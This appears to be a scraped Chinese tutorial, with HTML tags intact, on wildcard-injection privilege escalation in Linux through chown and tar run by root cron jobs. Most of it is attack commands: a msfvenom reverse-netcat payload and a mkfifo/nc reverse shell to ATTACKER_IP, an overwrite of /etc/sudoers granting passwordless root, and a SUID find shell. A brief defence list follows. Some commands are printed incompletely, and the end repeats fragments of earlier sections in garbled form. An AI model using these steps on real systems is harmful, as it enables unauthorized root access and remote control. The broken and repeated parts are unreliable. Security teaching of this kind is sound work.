通配符注入权限提升技术详解<\/h1>

一、通配符基础<\/h2>

通配符是UNIX\/Linux系统中用于匹配文件名模式的特殊字符，shell在执行命令前会先解释这些通配符：<\/p>

*<\/code>：匹配任意数量字符（包括零个字符）<\/li>
?<\/code>：匹配任意单个字符<\/li>
[]<\/code>：匹配指定字符集中的单个字符<\/li>
{}<\/code>：组合多个选项生成唯一字符串<\/li>

~<\/code>：表示用户主目录<\/li>
<\/ul>
二、通配符注入原理<\/h2>
当文件名以-<\/code>开头时，许多UNIX工具会将其解释为命令行选项而非文件名，这可能导致安全问题。<\/p>
示例：通配符狂野(Wildcard Wildness)<\/h3>
mkdir wild
<\/span><\/span>cd wild
<\/span><\/span>echo "Hello Friends"<\/span> > file1
<\/span><\/span>echo "This is Wildcard Injection"<\/span> > file2
<\/span><\/span>echo "take help"<\/span> > --help
<\/span><\/span><\/code><\/pre>执行cat *<\/code>时：<\/p>

前两个文件正常显示<\/li>
--help<\/code>文件会被cat<\/code>命令解释为-help<\/code>选项，显示帮助信息而非文件内容<\/li>
<\/ul>
三、通过chown劫持文件所有权<\/h2>
攻击场景<\/h3>


系统中有多个用户：<\/p>

root：超级用户<\/li>
raj：普通用户，拥有若干PHP文件<\/li>
aarti：普通用户<\/li>
ignite：恶意用户<\/li>
<\/ul>
<\/li>

恶意用户执行：<\/p>
<\/li>
<\/ol>
echo ""<\/span> > my.php
<\/span><\/span>echo > --reference=<\/span>my.php
<\/span><\/span><\/code><\/pre>
当root用户执行：<\/li>
<\/ol>
chown -R aarti:aarti *.php
<\/span><\/span><\/code><\/pre>攻击原理<\/h3>
--reference=my.php<\/code>被chown<\/code>解释为选项而非文件名，导致所有PHP文件的所有权被设置为与my.php<\/code>相同（即ignite用户）<\/p>
四、通过tar进行权限提升<\/h2>
第一阶段攻击：利用crontab<\/h3>
实验设置：<\/strong><\/p>
# 设置定时任务<\/span>
<\/span><\/span>nano \/etc\/crontab
<\/span><\/span>*\/1 * * * * root tar -zcf \/var\/backups\/html.tgz \/var\/www\/html\/*
<\/span><\/span><\/code><\/pre>攻击步骤：<\/strong><\/p>

生成反向shell：<\/li>
<\/ol>
msfvenom -p cmd\/unix\/reverse_netcat lhost=<\/span>ATTACKER_IP lport=<\/span>8888<\/span> R
<\/span><\/span><\/code><\/pre>
在目标机器上：<\/li>
<\/ol>
echo "mkfifo \/tmp\/lhennp; nc ATTACKER_IP 8888 0<\/tmp\/lhennp | \/bin\/sh >\/tmp\/lhennp 2>&1; rm \/tmp\/lhennp"<\/span> > shell.sh
<\/span><\/span>echo "checkpoint-action=exec=sh shell.sh"<\/span> 
<\/span><\/span>echo ""<\/span> > --checkpoint=<\/span>1<\/span>
<\/span><\/span>tar cf archive.tar *
<\/span><\/span><\/code><\/pre>原理：<\/strong><\/p>

--checkpoint=1<\/code>和--checkpoint-action=exec=sh shell.sh<\/code>被tar解释为选项<\/li>
当cron以root身份执行tar时，会执行我们的恶意脚本<\/li>
<\/ul>
第二阶段攻击：利用脚本中的tar<\/h3>
实验设置：<\/strong><\/p>
mkdir \/tmp\/data
<\/span><\/span>chmod 777<\/span> \/tmp\/data
<\/span><\/span>cd \/tmp\/data
<\/span><\/span>echo ""<\/span> > f1
<\/span><\/span>echo ""<\/span> > f2
<\/span><\/span>echo ""<\/span> > f3
<\/span><\/span>
<\/span><\/span>mkdir \/info
<\/span><\/span>cd \/info
<\/span><\/span>nano script.sh
<\/span><\/span>chmod 777<\/span> script.sh
<\/span><\/span><\/code><\/pre>script.sh内容：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>cd \/tmp\/data
<\/span><\/span>tar cf \/info\/backup.tgz *
<\/span><\/span><\/code><\/pre>设置crontab：<\/p>
*\/1 * * * * root \/info\/script.sh
<\/span><\/span><\/code><\/pre>攻击方法：<\/strong>

与第一阶段相同，在\/tmp\/data目录中创建恶意文件<\/p>
五、其他攻击方法<\/h2>
方法一：添加用户到sudoers文件<\/h3>
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > \/etc\/sudoers'<\/span> > demo.sh
<\/span><\/span>echo "checkpoint-action=exec=sh demo.sh"<\/span> 
<\/span><\/span>echo ""<\/span> > --checkpoint=<\/span>1<\/span>
<\/span><\/span>tar cf archive.tar *
<\/span><\/span><\/code><\/pre>1分钟后，ignite用户将获得root权限<\/p>
方法二：设置SUID权限<\/h3>
echo "chmod u+s \/usr\/bin\/find"<\/span> > test.sh
<\/span><\/span>echo "checkpoint-action=exec=sh test.sh"<\/span> 
<\/span><\/span>echo ""<\/span> > --checkpoint=<\/span>1<\/span>
<\/span><\/span>tar cf archive.tar *
<\/span><\/span>
<\/span><\/span># 利用SUID find<\/span>
<\/span><\/span>find f1 -exec "\/bin\/sh"<\/span> \;<\/span>
<\/span><\/span><\/code><\/pre>六、防御措施<\/h2>

避免在root cronjob中使用通配符<\/li>
在脚本中使用--<\/code>选项终止参数解析：
tar cf archive.tar -- *
<\/span><\/span><\/code><\/pre><\/li>
检查文件名是否包含可疑字符<\/li>
使用绝对路径执行命令<\/li>
限制cronjob的权限范围<\/li>
<\/ol>
七、总结<\/h2>
通配符注入是一种利用UNIX工具对命令行参数和文件名处理方式的漏洞进行权限提升的技术。通过精心构造恶意文件名，攻击者可以：<\/p>

劫持文件所有权<\/li>
执行任意命令<\/li>
获取root权限<\/li>
修改系统配置<\/li>
<\/ol>
系统管理员应特别注意cronjob中使用通配符的情况，并采取适当的防御措施。<\/p>

通配符注入权限提升技术详解<\/h1>

二、通配符注入原理<\/h2>
当文件名以`-<\/code>开头时，许多UNIX工具会将其解释为命令行选项而非文件名，这可能导致安全问题。<\/p>`

三、通过chown劫持文件所有权<\/h2>

攻击原理<\/h3>
`--reference=my.php<\/code>被chown<\/code>解释为选项而非文件名，导致所有PHP文件的所有权被设置为与my.php<\/code>相同（即ignite用户）<\/p>`

通配符注入权限提升技术详解<\/h1>

二、通配符注入原理<\/h2> 当文件名以-<\/code>开头时，许多UNIX工具会将其解释为命令行选项而非文件名，这可能导致安全问题。<\/p>

三、通过chown劫持文件所有权<\/h2>

攻击原理<\/h3> --reference=my.php<\/code>被chown<\/code>解释为选项而非文件名，导致所有PHP文件的所有权被设置为与my.php<\/code>相同（即ignite用户）<\/p>

二、通配符注入原理<\/h2>
当文件名以`-<\/code>开头时，许多UNIX工具会将其解释为命令行选项而非文件名，这可能导致安全问题。<\/p>`

攻击原理<\/h3>
`--reference=my.php<\/code>被chown<\/code>解释为选项而非文件名，导致所有PHP文件的所有权被设置为与my.php<\/code>相同（即ignite用户）<\/p>`